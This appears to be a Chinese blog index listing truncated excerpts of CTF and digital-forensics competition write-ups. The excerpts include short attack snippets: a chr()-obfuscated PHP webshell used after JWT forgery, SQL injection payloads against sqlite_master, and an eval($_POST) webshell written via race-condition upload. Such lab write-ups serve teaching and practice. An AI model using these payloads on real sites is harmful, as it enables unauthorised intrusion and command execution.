常用资源汇总
常用资源汇总由于本人脑子不好使,经常忘一些东西,故写篇文章汇总一些资源以便随时使用。 命令类GitfastbootADB 工具类Arjun sqlmap fenjing flask-session-cookie-manager fastcoll
2026平航杯
服务器取证分析服务器镜像,内核版本为? 分析服务器镜像,用户登录成功系统的次数为 分析服务器镜像,redis数据库服务密码是多少仿真服务器,在本地连接。Redis 的配置文件通常位于 /etc/redis/redis.conf 1sudo cat /etc/redis/redis.conf 根据配置文件可以找到密码是zjjcxy 分析服务器镜像,api站点后台管理员密码所用的加密算法为我们先看一
2025獬豸杯复现
一上手感觉难度比平航杯大很多,题目与题目之间没有故事线串起来,遂写一篇复现记录一下做题思路 手机取证登录的直播 APP 的 IDX 是多少?idx是一个用户信息,大概率会在数据库里面找到 先用火眼分析应用列表 那么就是烟雨直播了,我们去搜索一下包的位置 data.tar/data_242/com.huodong.yanyu,我们在databases文件夹下面找到一堆数据库,这里应该是要用navi
PolarisCTF
only real非预期直接看/flag.php就行 revengejwt爆破密钥伪造admin之后就可以上传图片,后端对文件类型没有校验,直接抓包修改文件后缀名,文件内容有WAF,我们使用ascii🐎 12345678<?=$func=chr(115).chr(121).chr(115).chr(116).chr(101).chr(109);$cmd='';
SDPCSEC纳新赛3.0
webreal_signin提示有备份,直接扫一下目录,果然发现了index.php.bak 12345678910111213141516171819<?php$SECRET_KEY='xxxxxxxxxxxx'; # len($SECRET_KEY) = 12function hashEncode($data) { global $SECRET_KEY
数字中国暨第六届“红明谷”初赛
被ai杀爆了 gopherblog1GET /api/posts/search?q=' OR 1=1 -- 返回了所有文章,存在SQL注入漏洞 1' UNION SELECT 1,name,sql,2,3',4 FROM sqlite_master WHERE type='table' -- 查表,有users,settings,posts
ctfshow
文件上传web161-163文件头伪造1GIF89a 竞争上传123<?php$f=fopen("7.php","w");fputs($f,'<?php eval($_POST[7]);?>');?> web164上传一个正常的图片,发现查看图片的时候存在文件包含漏洞,打一个图片马 12345678910111
Pyjail沙箱逃逸
引子[SHCTF_3rd]Eazy_Pyrunner通过任意文件读取漏洞我们可以读到源代码 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818
